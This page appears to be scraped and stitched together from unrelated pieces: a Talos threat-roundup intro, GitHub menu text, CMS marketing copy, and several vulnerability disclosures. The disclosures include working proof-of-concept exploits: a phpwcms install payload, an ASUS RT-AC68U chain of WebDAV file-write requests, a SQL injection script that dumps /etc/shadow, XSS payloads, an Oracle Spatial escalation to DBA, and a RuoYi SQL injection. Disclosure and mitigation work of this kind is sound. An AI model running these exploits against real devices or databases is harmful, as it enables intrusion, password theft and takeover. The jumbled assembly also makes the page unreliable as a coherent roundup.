Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Jan. 27 and Feb. 3. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key

Threat Round up for January 27 to February 3

A vulnerability was found in fanzila WebFinance 0.5 and classified as critical. This issue affects some unknown processing of the file htdocs/admin/save_taxes.php. The manipulation of the argument id leads to sql injection. The name of the patch is 306f170ca2a8203ae3d8f51fb219ba9e05b945e1. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-220055.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2013-10016: * htdocs/admin/save_taxes.php: fixed another SQL injection · fanzila/WebFinance@306f170

A vulnerability has been found in fanzila WebFinance 0.5 and classified as critical. This vulnerability affects unknown code of the file htdocs/admin/save_Contract_Signer_Role.php. The manipulation of the argument n/v leads to sql injection. The name of the patch is abad81af614a9ceef3f29ab22ca6bae517619e06. It is recommended to apply a patch to fix this issue. VDB-220054 is the identifier assigned to this vulnerability.

CVE-2013-10015

Cross Site Scripting (XSS) vulnerability in yzmcms 6.1 allows attackers to steal user cookies via image clipping function.

**我们的优势**

OUR ADVANTAGE

YzmCMS（以下简称本产品）采用面向对象方式自主研发的YZMPHP框架开发，它是一款开源高效的内容管理系统，产品基于PHP+Mysql架构，可运行在Linux、Windows、MacOSX、Solaris等各种平台上。

本产品自v3.0起，完全采用MVC框架式开发，增加了程序的维护性、可扩展性，并采用模块化开发设计，使二次开发变得简单、容易，系统设计的模板标签，让前端人员可独立完成模板制作及数据调用，后台管理员可自定义模型功能，不会编程就实现各种信息发布和检索。

本产品源码简洁、严谨、安全、高效、源码100%开源，作者用心优化每一行代码，减少冗余，给用户的第一感觉就是“快”，程序运行快、加载快、效率高、轻量级！！！

CVE-2021-36712: YzmCMS官方网站 - 轻量级开源CMS

An issue discovered in phpwcms 1.9.25 allows remote attackers to run arbitrary code via DB user field during installation.

进入安装流程，在MySQL database settings处输入payload：root\';phpinfo();//

Enter the installation process, enter the payload in the MySQL database settings: root\';phpinfo();//  
  
点击Continue。重新刷新页面，执行php代码

Click Continue. Re-refresh the page and execute the php code  
  
在setup/inc/setup.func.inc.php 的write_conf_file中对外部输入参数进行了过滤并拼接

The external input parameters are filtered and spliced in the write_conf_file of setup/inc/setup.func.inc.php  
  
过滤替换'为\'，输入\'将被替换为\\'，前面的\将后面的\进行了转义导致其失效。

Filtering replaces ' with \', inputting \' will be replaced with \\', the front \ will escape the following \ to make it invalid.  
  
最终结果

Final Results

CVE-2021-36424: Code execution during installation · Issue #310 · slackero/phpwcms

Directory Traversal vulnerability in Cloud Disk in ASUS RT-AC68U router firmware version before 3.0.0.4.386.41634 allows remote attackers to write arbitrary files via improper sanitation on the target for COPY and MOVE operations.

Over the summer of my junior year, I decided to do some router pentesting. Embedded security always seemed very fun to me. I liked the idea of breaking things that are found in our everyday lives, and what better place to start than my router. I was also inspired by my friend @arinerron who had some success with his router previously.

I dumped the firmware and started analyzing the binaries in Ghidra. I also found a GitHub repository containing a modified version of the source which greatly helped with the reversing process.

**Thoughts**

In the end, I managed to find a pre-auth arbitrary file read vulnerability, which could be used to dump /etc/shadow. From here, this could be chained with an authenticated arbitrary file write vulnerability to achieve code execution.

A shodan search suggests that around 200 thousand routers online could be potentially vulnerable, although because some specialized configuration is required the actual number is probably a bit lower.

One thing I found interesting was how many of the vulnerabilities involved “off-by-slash” issues. For example, requests to /smb/* required authentication but not /smb. If anything, this shows the importance of paying attention to the details when performing code audits.

It was also cool how there was an exploitable SQL injection vulnerability in such a seemingly low-level target.

Even though the code quality wasn’t the highest - many of these vulnerabilities were not very well hidden - this was overall a pretty fun exercise in code-review.

**Timeline**

08/18/2020 - Vulnerability submitted to [email protected]  
08/18/2020 - Vendor response  
10/25/2020 - Beta firmware - official release “in one month”  
12/19/2020 - Additional correspondence  
01/18/2021 - 3.0.0.4.386.41634 released

**Writeup**

_This is an adapted version of the writeup that was sent to the ASUS security team._

This document summarizes the results of my pentesting against ASUS RT-AC68U on the latest firmware version 3.0.0.4.385_20632. These vulnerabilities range from simple denial of service, to a no-interaction unauthenticated remote code execution chain. Many of these likely apply to other similar router versions as well. I also discuss several solutions for remediation.

These were patched in version 3.0.0.4.386.41634.

Overall, I present the following vulnerabilities:

1.  No-interaction pre-authentication RCE chain
2.  No-interaction pre-authentication persistent DOS chain
3.  3 XSS vectors, two of which could chain to RCE
4.  2 temporary denial of service exploits

**Vulnerabilities**

Note that you will need to enable the lighttpd server by going to http://router.asus.com/cloud\_main.asp and enabling Cloud Disk.

Additionally, some of the exploits require the mounting of an external device.

**MOVE/COPY Priming**

No authentication file-write to /mnt/*. An attacker chain this with MOVE/COPY Off By Slash to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

There are two relevant primitives - file creation and directory creation.

    fetch("/smb/js/jplayer", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_directory creation_

    fetch("/smb/control", {
      "headers": {
        "destination": "https://domain.tld/RT-AC68U/customdir/testfile",
        "overwrite": "T",
      },
      "body": "",
      "method": "MOVE"
    });
    

_file creation_

This allows an attacker to overwrite arbitrary contents under /mnt. Note that an attacker is able to create any file structure they desire with these primitives. However, while the file layout is attacker controlled, the content within the files is not.

**Analysis**

Improper sanitation on the source for COPY and MOVE operations allows an attacker to load preexisting files from the router, even without authentication.

**Mitigation**

1.  Ensure that con->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Clobbering**

Authenticated arbitrary file write to /*. Can escalate to RCE by overwriting executable files, for example /etc/zcip. Can also modify internal variables such as the router password by writing to /dev/nvram.

**POC**

Create a directory structure as such.

    /mnt
      /USB-NAME
        /path
          /etc
            passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U/USB-NAME/path", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

This will overwrite /etc/passwd.

**Analysis**

Improper sanitation on the target for COPY and MOVE operations gives an attacker an arbitrary file-write primitive.

**Mitigation**

1.  Ensure that p->physical.path starts with /mnt in the mod_webdav.so for HTTP_METHOD_MOVE and HTTP_METHOD_COPY.

**MOVE/COPY Off By Slash**

No-authentication arbitrary file copying from /mnt/* to /*. Can combine with MOVE/COPY Priming to remotely brick a router, for example, by overwriting /etc/shadow or other important configuration files.

**POC**

Create a directory structure as such.

    /mnt
      /etc
        passwd
    

Run the below JavaScript.

    fetch("/RT-AC68U", { 
      "headers": {
        "overwrite": "T",
        "destination": "https://domain.tld/",
      },
      "body": "",
      "method": "COPY",
    });
    

**Analysis**

The authentication handler has an off-by-slash error, matching for /RT-AC68U/ instead of /RT-AC68U. Thus, it allows unauthenticated requests to /RT-AC68U to hit the endpoint (note that adding a slash results in a 401). This allows an attacker to perform a copy operation from /mnt to /, exploiting a similar vulnerability as in MOVE/COPY Clobbering. By creating a fake directory structure with MOVE/COPY Priming, these two vulnerabilities give an attacker a write-anywhere primitive.

**Mitigation**

1.  Ensure the authentication handler filters requests against /RT-AC68U instead of /RT-AC68U/.

**PROPFINDMEDIALIST SQL Injection**

No user-interaction arbitrary file-read. By reading /etc/shadow, an unauthorized remote attacker can disclose a hashed password. Cracking this offline gives the router password. Can be combined with MOVE/COPY Clobbering for a full no-interaction RCE chain.

**POC**

You will need to enable the Digital Media Server functionality.

Run the below javascript, for example in the dev console, while on the AiCloud page.

    (async() => {
    var author = "" + Math.random();
    var path = "/etc/shadow";
    var dId = Math.floor(100000 * Math.random()) + 10000
    var oId = Math.floor(100000 * Math.random()) + 10000
    var pId = Math.floor(100000 * Math.random()) + 10000
    var val = ("a' OR 1 ); INSERT INTO DETAILS (TITLE, ALBUM_ART, ARTIST, ID) VALUES ('a', '" + pId + "', '" + author + "', " + dId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 ); INSERT INTO OBJECTS (PARENT_ID, OBJECT_ID, DETAIL_ID, CLASS) VALUES ('1$7', " + oId + ", " + dId + ", 'container.album.musicAlbum'); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
    
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    val = ("a' OR 1 );  INSERT INTO ALBUM_ART (PATH, ID) VALUES ('" + path + "', " + pId + "); -- ").split("'").join("%27")
    console.log(val.length)
    
    
    await fetch("/smb", {
      "headers": {
        "keyword": val,
        "mediatype": "1",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "PROPFINDMEDIALIST",
    });
    
    await fetch("/smb", {
      "headers": {
        "classify": "album",
      },
      "body": "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\" ?><D:propfind xmlns:D=\"DAV:\"><D:prop><D:getlastmodified/><D:getcontentlength/><D:getcontenttype/><D:getmatadata/></D:prop></D:propfind>",
      "method": "GETMUSICCLASSIFICATION"
    }).then(a => a.text()).then(b => {
    var aidx = b.indexOf(author)
    var pay = b.substring(b.indexOf("<thumb_image>", aidx) + "<thumb_image>".length, b.indexOf("</thumb_image>", aidx))
    
    console.log(atob(pay))
    })
    })()
    

**Analysis**

        //- Avoid SQL injection!
        if( keyword!=NULL && strstr(keyword->ptr, "'")!=NULL) {      
          Cdbg(DBE, "keyword is invalid!");
          
        ...
        
        if(!buffer_is_empty(keyword)){      
          buffer_urldecode_path(keyword);
    

_mod\_webdav.c_

The check for SQL injection happens before the url decode. This allows an attacker to pass in a URL-encoded single quote, %27, bypassing any SQL injection mitigations. In addition, stacked queries are enabled allowing an attacker to easily chain statements. This can be used to create a fake album, which is ultimately triggered by the GETMUSICCLASSIFICATION method, passing a fake filepath to get_album_cover_image.

        char* album_cover_file = result2[1];
                      
        FILE* fp = fopen(album_cover_file, "rb");
    

_mod\_webdav.c_

The contents of this file pointer are then read into a buffer, and then passed directly back to the attacker.

**Mitigation**

1.  Perform the SQL injection check after bufer_urldecode_path.
2.  Sanity check on album_cover_file, for example strncmp(album_cover_file, "/mnt", 4)

Given a single valid share link, an attacker can disclose any other file.

**POC**

Create a file structure as shown (a single folder with files a.txt and b.txt).

    /mnt/XXX 
      a.txt
      b.txt
    

Create a sharelink for a.txt. Append /%2e%2e/b.txt to the sharelink.

Your final URL should look like https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt. Curl the URL - curl -k https://domain.tld/AICLOUDXXXXXXX/a.txt/%2e%2e/b.txt - and note that b.txt gets downloaded.

**Analysis**

mod_aicloud_sharelink_parser URL decodes the path, but fails to filter out path traversals like /../ after decoding.

**Mitigation**

1.  Filter out /../ from AICLOUD paths

**picasa.html XSS**

With user-interaction account takeover - total file disclosure and chain with above to remote code execution.

**POC**

While logged in, visit /smb/css/service/picasa.html?v=%3C%2ftextarea%3E%3Cscript%3Ealert(%27XSS%27)%3C%2fscript%3E.jpg

**Analysis**

The abbreviated JS is shown below.

      var uploadfile_url = getUrlVars()["v"];
      ...
      var this_filename = decodeURIComponent( uploadfile_url
        .substr( uploadfile_url.lastIndexOf("/") + 1, uploadfile_url.length-1 ) );
      ...
      upload_html += '<textarea style="resize: none; width: 292px; height: 82px;" 
        autocomplete="off" id="title" name="title" class="x-form-textarea x-form-field 
        service_upload_field ' + className + '">' + this_filename + '</textarea>';
    

Note that the value of the v parameter is reflected directly into the HTML (after decoding). A malicious filename like </textarea><script>alert('XSS')</script> allows an attacker to inject scripts. This could be done silently from an attacker controlled webpage, giving an attacker access to the router as long as the user is logged in.

**Mitigation**

1.  Sanitize the value of this_filename before injecting into the HTML, as shown below.

    return mystring.replace(/&/g, "&amp;").replace(/>/g, "&gt;").replace(/</g, "&lt;").replace(/"/g, "&quot;");
    

2.  Exit on invalid characters in file name - blacklist <>.

**urlInfo XSS**

Same impact scenario as picasa.html XSS.

**POC**

While logged out, navigate to /RT-AC68U/zz%27onmouseover=a.hidden=true;alert(origin)%20id=a%20style=width:100vw;position:fixed;top:0;height:100vh;opacity:0.01%20a=

**Analysis**

The handler for urlInfo fails to escape single quotes.

              buffer_copy_string_len(out, CONST_STR_LEN("<input class='urlInfo' value='"));        
              buffer_append_string_buffer(out, con->url.rel_path);        
              buffer_append_string_len(out, CONST_STR_LEN("' type='hidden'>"));
    

_connections.c_

**Mitigation**

1.  Sanitize the urlInfo property. Escape single quotes, replacing them with the HTML entity &apos;

**openurl XSS**

Same impact scenario as picasa.html XSS.

**POC**

Navigate to /smb/..%2f'onload='alert(origin) while logged in\`.

**Analysis**

This injects the openurl property on body. The final rendered HTML is as such.

    <body openurl='/smb/../'onload='alert(origin)' fileview_only='1'></body>
    

**Mitigation**

1.  Sanitize the openurl property. Escape single quotes, replacing them with the HTML entity &apos;

**AINVITE POST Handler DOS**

No interaction/authentication denial of service.

**POC**

Run the below code in the developer console on the lighttpd webpage. This sends a POST request with body “junk” to /AINVITE.

    fetch("/AINVITE", {
      "body": "junk",
      "method": "POST"
    });
    

**Analysis**

The handler for post data looks as such.

    iVar1 = parse_postdata_from_chunkqueue(param_1,param_2,param_2->field_0x54,&local_6c);
    if ((iVar1 == 0) && (local_6c != (void *)0x0)) {
      action_value = (char *)get_url_param_ualue(local_6c,"action");
      iVar1 = strcmp(action_value,"register");
    

Note that if get_url_param_ualue(local_6c, "action"), which gets the form data parameter, returns a null value the subsequent call to strcmp will result in a NULL pointer dereference.

**Mitigation**

1.  Add a check for the return value of get_url_param_ualue(local_6c, "action") to see if it is NULL before passing into strcmp.

**/AINVIT DOS**

No interaction/authentication denial of service.

**POC**

Visit /AINVIT. This will crash the lighttpd instance.

**Analysis**

In the handler mod_aicloud_invite.so, the comparison logic looks as such.

    iVar1 = strncmp(*param_2->field_0x108,"/AINVITE",7);
    if (iVar1 == 0) {
      local_38 = strstr(*param_2->field_0x108,"/AINVITE");
      local_38 = local_38 + 1;
      if (local_38 == (char *)0x0) {
        param_2->field_0x80 = 400;
        param_2->field_0x48 = 1;
        ret_code = 2;
      }
    

Note that however, the length of “/AINVITE” is 8. Thus, if /AINVIT is sent, it’ll pass the strncmp comparison, while returning null for strstr. While there is a null check, the pointer is incremented by 1, making it worthless. This results in a null pointer dereference later.

**Mitigation**

1.  Perform the null check before incrementing the pointer.
2.  strncmp with a length of 8

CVE-2021-37317: ASUS RT-AC68U RCE

Oracle Database version 12.1.0.2 suffers from a privilege escalation vulnerability that achieves DBA access via the Spatial component.

Title: Oracle Database Privilege Escalation Through Oracle Spatial Component  
Product:                   Database  
Manufacturer:              Oracle  
Affected Version(s):       12.1.0.2  
Tested Version(s):         12cR1  
Risk Level:                High  
Solution Status:           Fixed in Oracle Critical Patch Update October 2021  
CVE Reference:             N/A, Backported in Oracle CPU OCT 2021  
Author of Advisory:        Emad Al-Mousa

Overview:

Privilege Escalation is a famous security vulnerability (explitation technique)..... attackers seek to compromoise IT systems for multiple objectives such as data exfiltration, cause outage,....etc.

*****************************************  
Vulnerability Details:

The following is a privilege escalation vulnerability where an attacker can escalate his/her account permissions to "DBA" role. DBA role in Oracle is a very powerfull role where the user can view & edit any data within the database, create database objects (tables,malcious code,....etc) and many other harmful activities. The vulnerability exists IF the database system has Oracle "Spatial" component is installed. This vulnerability existed in Oracle 12cR1 and backport fix was issued in October 2021.

To check if Oracle Spatial Component is installed, run the following SQL query as it will list ALL installed components within the database system:

SQL> select comp_name from dba_registry;

*****************************************  
Proof of Concept (PoC):

// I will create an account called ironman using SYS account, the account will be granted “create session” to connect to the database and “create any procedure”, and “execute any procedure” permissions:

sqlplus / as sysdba

SQL> create user ironman identified by iron_123;

SQL> grant create session to ironman;

SQL> grant create any procedure to ironman;

SQL> grant execute any procedure to ironman;

SQL> exit;

// I will now connect using the newly created account “ironman” using sql plus

sqlplus ironman/iron_123

SQL> show user

USER is “IRONMAN”

SQL> select * from session_roles;

no rows selected

SQL> create or replace  procedure  SPATIAL_CSW_ADMIN_USR.hulk  (SQL_TEXT  IN  VARCHAR2) as

    BEGIN

    EXECUTE IMMEDIATE (SQL_TEXT);

    END hulk;  
/

SQL> execute SPATIAL_CSW_ADMIN_USR.hulk('grant DATAPUMP_IMP_FULL_DATABASE to ironman');

SQL> select * from session_roles;

no rows selected

SQL> set role DATAPUMP_IMP_FULL_DATABASE;

// ironman account is escalated to the role DATAPUMP_IMP_FULL_DATABASE

SQL> select * from session_roles;

ROLE

——————————————————————————–

DATAPUMP_IMP_FULL_DATABASE

EXP_FULL_DATABASE

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

IMP_FULL_DATABASE

8 rows selected.

// the next escalation level is to DBA role !!

SQL> grant dba to ironman;

SQL> set role dba;

SQL> select * from session_roles;

ROLE

——————————————————————————–

DBA

SELECT_CATALOG_ROLE

HS_ADMIN_SELECT_ROLE

HS_ADMIN_ROLE

HS_ADMIN_EXECUTE_ROLE

EXECUTE_CATALOG_ROLE

DELETE_CATALOG_ROLE

EXP_FULL_DATABASE

Advertisements  
Report this ad

IMP_FULL_DATABASE

DATAPUMP_EXP_FULL_DATABASE

DATAPUMP_IMP_FULL_DATABASE

ROLE

——————————————————————————–

GATHER_SYSTEM_STATISTICS

SCHEDULER_ADMIN

XDBADMIN

XDB_SET_INVOKER

JAVA_ADMIN

JAVA_DEPLOY

WM_ADMIN_ROLE

CAPTURE_ADMIN

OPTIMIZER_PROCESSING_RATE

EM_EXPRESS_ALL

EM_EXPRESS_BASIC

22 rows selected.

--- Conclusion:

The account ironman has been successfully elevated  to the “DBA” role which is the highest database role in Oracle database system.

*****************************************  
- Defensive Techniques:

configure auditing to catch any privilege escalation attempts.  
review database account permissions on regular basis.  
ensure database accounts have strong passwords, and rotate passwords regularly if possible.  
perform VA (vulnerability assesment) scans on regular basis.  
pro-actively patch your systems and database systems.

*****************************************  
References:  
https://www.oracle.com/security-alerts/cpuoct2021.html  
https://databasesecurityninja.wordpress.com/2021/10/22/oracle-database-privilege-escalation-through-oracle-spatial-component/comment-page-1/

Credit:   
Security-In-Depth Contributors: Emad Al-Mousa

Oracle Database 12.1.0.2 Spatial Component Privilege Escalation

RuoYi up to v4.7.5 was discovered to contain a SQL injection vulnerability via the component /tool/gen/createTable.

com/ruoyi/generator/controller/GenController 下/tool/gen/createTable路由存在sql注入。

    @RequiresRoles("admin")
    @Log(title = "创建表", businessType = BusinessType.OTHER)
    @PostMapping("/createTable")
    @ResponseBody
    public AjaxResult create(String sql)
    {
        try
        {
            SqlUtil.filterKeyword(sql);
            List<SQLStatement> sqlStatements = SQLUtils.parseStatements(sql, DbType.mysql);
            List<String> tableNames = new ArrayList<>();
            for (SQLStatement sqlStatement : sqlStatements)
            {
                if (sqlStatement instanceof MySqlCreateTableStatement)
                {
                    MySqlCreateTableStatement createTableStatement = (MySqlCreateTableStatement) sqlStatement;
                    if (genTableService.createTable(createTableStatement.toString()))
                    {
                        String tableName = createTableStatement.getTableName().replaceAll("`", "");
                        tableNames.add(tableName);
                    }
                }
            }
            List<GenTable> tableList = genTableService.selectDbTableListByNames(tableNames.toArray(new String[tableNames.size()]));
            String operName = Convert.toStr(PermissionUtils.getPrincipalProperty("loginName"));
            genTableService.importGenTable(tableList, operName);
            return AjaxResult.success();
        }
        catch (Exception e)
        {
            logger.error(e.getMessage(), e);
            return AjaxResult.error("创建表结构异常[" + e.getMessage() + "]");
        }
    }
    

这段代码可以用过/\*\*/绕过关键字

    public static String SQL_REGEX = "select |insert |delete |update |drop |count |exec |chr |mid |master |truncate |char |and |declare ";
    

由于这段代码会将错误信息回显

    logger.error(e.getMessage(), e);
            return AjaxResult.error("创建表结构异常[" + e.getMessage() + "]");
    

poc

    sql=CREATE table ss1 as SELECT/**/* FROM sys_job WHERE 1=1 union/**/SELECT/**/extractvalue(1,concat(0x7e,(select/**/version()),0x7e));
    

**参考链接**

https://github.com/luelueking/ruoyi-4.7.5-vuln-poc/edit/main/README.md

**修复意见**

*   把过滤关键词中的空格去掉
*   对异常处理中的返回信息进行修改，不直接返回e.getMessage()，对报错信息进行抽象以避免报错注入

**报告人**

@陈再

CVE-2022-48114: ruoyi-4.7.5-sqli-vuln-poc[BUG] · Issue #I65V2B · 若依/RuoYi - Gitee.com

Easyone CRM v5.50.02 was discovered to contain a SQL Injection vulnerability via the text parameter at /Services/Misc.asmx/SearchTag.

**EasyoneCRM-5.50.02-SQLinjection**

Easyone One is an Italian CRM company with 14 years of experience with a mission: to organize the sales process of companies, in an increasingly complex and competitive market, through the digitization of one of the most important and strategic activities: the relationship with the customer. Easyone is not a CRM vendor, the company directly produces and develops its own CRM solution for the Italian market.

Easyone developed integration with the most popular management systems on the Italian market: Alyante and Team System Metodo; SageX3, Galileo by San Marco Informatica, Arca by Wolters Kluwer Italia, Business by NTS, MecSal by Passpartout and more.

Easyone has more than 1500 active customers in Italy.

**Description**

The vulnerability allows a remote attacker to execute arbitrary SQL queries on a database.

The vulnerability exists due to insufficient sanitization of user-supplied data. A remote non-authenticated attacker can send a specially crafted request to the affected application and execute arbitrary SQL commands within the application database.

Successful exploitation of this vulnerability may allow a remote attacker to read, delete, modify data in the database and gain complete control over the affected application.

**Versions**

Tested Vulnerable version: 5.50.02

Patched version: 5.50.02.03

**Timeline**

*   30/08/2022 - Contacted Easyone IT department via e-mail regarding the vulnerability
*   05/09/2022 - Contacted Easyone IT department via telephone regarding availability slot to discuss the vulnerability
*   19/09/2022 - Call with Easyone IT department - vulnerability explained and recognized by Easyone IT department
*   19/09/2022 - CVE request approved by Easyone IT department
*   19/09/2022 - Contacted Easyone IT department via e-mail with summary of the call - patching of the vulnerability planned
*   28/10/2022 - Contacted Easyone IT department asking about patching
*   28/10/2022 - Easyone IT department confirms the successful patching and the release of the patched version
*   02/11/2022 - First CVE request sent
*   21/11/2022 - Reminder e-mail to cve.mitre.org
*   29/11/2022 - Reminder e-mail to cve.mitre.org
*   06/12/2022 - Reminder e-mail to cve.mitre.org
*   14/12/2022 - cve.mitre.org asked about advisory
*   15/12/2022 - CVE request with advisory provided to cve.mitre.org

**Execution**

*   Vulnerable **text** parameter via GET: domain.com/Services/Misc.asmx/SearchTag?text=SQLI

**Authors**

Luca Bernardi, Davide Bianchin, Fortunato \[fox\] Lodari @ Deda Cloud Cybersecurity Team

CVE-2022-48082: GitHub - purplededa/EasyoneCRM-5.50.02-SQLinjection

Analysts find that 98% of QNAP NAS are vulnerable to CVE-2022-27596, which allows unauthenticated, remote SQL code injection.

A critical security vulnerability in QNAP's QTS operating system for network-attached storage (NAS) devices could allow cyberattackers to inject malicious code into devices remotely, with no authentication required.

According to researchers from security firm Censys, more than 30,000 hosts are running a vulnerable version of the QNAP-based system as of press time, meaning that approximately 98% of these devices could be attacked.

The issue (CVE-2022-27596) is a SQL injection problem that affects QNAP QTS devices running versions below 5.0.1.2234, and QuTS Hero versions below h5.0.1.2248. It carries a score of 9.8 out of 10 on the CVSS vulnerability-severity scale.

In its advisory this week, QNAP said the bug has a low attack complexity, which, when combined with the popularity of QNAP NAS as a target for Deadbolt ransomware and other threats, could make for imminent exploitation in the wild. And unfortunately, according to Censys, it's a target-rich environment out there.

"Censys has observed 67,415 hosts with indications of running a QNAP-based system; unfortunately, we could only obtain the version number from 30,520 hosts," the firm explained in a blog post on Feb. 1. "We found that of the 30,520 hosts with a version, only 557 were running \[patched versions\], meaning 29,968 hosts could be affected by this vulnerability."

To protect themselves, companies should upgrade their devices to QTS version 5.0.1.2234 and QuTS Hero h5.0.1.2248.

"If the exploit is published and weaponized, it could spell trouble to thousands of QNAP users," Censys researchers warned. "Everyone must upgrade their QNAP devices immediately to be safe from future ransomware campaigns."

Tag

#sql